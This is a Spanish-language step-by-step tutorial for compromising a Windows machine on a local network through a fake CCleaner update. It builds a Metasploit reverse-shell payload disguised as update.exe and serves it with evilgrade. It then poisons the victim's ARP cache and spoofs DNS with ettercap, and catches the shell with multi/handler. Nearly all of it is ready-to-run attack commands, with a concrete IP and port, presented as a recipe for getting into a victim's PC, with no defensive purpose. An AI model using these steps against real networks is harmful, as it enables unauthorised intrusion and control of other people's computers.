Tutorial Evilgrade -Necesitamos: Ettercap Metasploit Evilgrade (o isr-evilgrade) -Preparando el payload: Lo primero de todo listamos los payloads de metasploit. Para ello abrimos una terminal y tecleamos: msfpayload -l
Escogemos un payload, ahora tenemos que saber cual es nuestra ip, para ello en la misma terminal tecleamos: ifconfig
En mi caso voy a utilizar el interface eth0 y su ip es 192.168.100.10 Ahora llega el momento de crear el payload, yo he elegido el payload windows/shell/reverse_tcp. Para crear el payload tecleamos en una terminal lo siguiente: msfpayload
LHOST= LPORT= X > nombredepayload.exe En mi caso quedaría de la siguiente manera: msfpayload windows/shell/reverse_tcp LHOST=192.168.100.10 LPORT=4444 X > update.exe
Procedemos a abrir evilgrade Yo voy a utilizar el modulo de ccleaner, para ello tecleamos en evilgrade: configure ccleaner Para ver las opciones del modulo escribimos: show options Ahora seleccionamos el payload generado anteriormente, en este caso es: set agent /root/update.exe
Ahora configuraremos los DNS, para ello abrimos otra terminal y tecleamos: nano /etc/ettercap/etter.dns Al final de documento añadimos la url del servidor virtual que nos muestra evilgrade y apuntamos esa dirección hacía nuestra ip local, en mi caso quedaría de la siguiente manera: www.ccleaner.com A 192.168.100.10 Guardamos los cambios y salimos del editor. Abrimos ettercap, para ello teclearemos en la terminal: ettercap -G Seleccionamos Sniff-->Unified sniffing Y seleccionamos la intefaz desde la que escucharemos, en mi caso es eth0 Después escanearemos los host, Hosts-->Scan for Hosts Y mostramos los hosts escaneados Hosts-->Hosts list Seleccionamos la puerta de enlace y pulsamos Add to Target 1
Seleccionamos la ip a atacar y pulsamos Add to Target 2 Después Mitm-->Arp poisoning y pulsamos Sniff remote connections Plugins-->Manage the plugins y hacemos doble click en dns_spoof Abrimos una nueva terminal e iniciamos metasploit: /etc/init.d/postgresql start /etc/init.d/metasploit start msfconsole
Ahora seleccionamos el exploit a utilizar, en este caso usaré: use exploit/multi/handler Ahora debemos seleccionar el payload que habíamos utilizado anteriormente: set PAYLOAD windows/shell/reverse_tcp Ya solo queda configurar el payload show options En este caso simplemente es poner en LHOST nuestra ip local: set LHOST 192.168.100.10
Volvemos a ettercap y pulsamos Start-->Start sniffing En la terminal de evilgrade tecleamos start En la terminal de msfconsole tecleamos exploit
Cuando la víctima vaya a actualizar ccleaner se descargar nuestro payload y al instalarlo ya estaremos dentro de su pc.
Creado por Mario Martinez [email protected]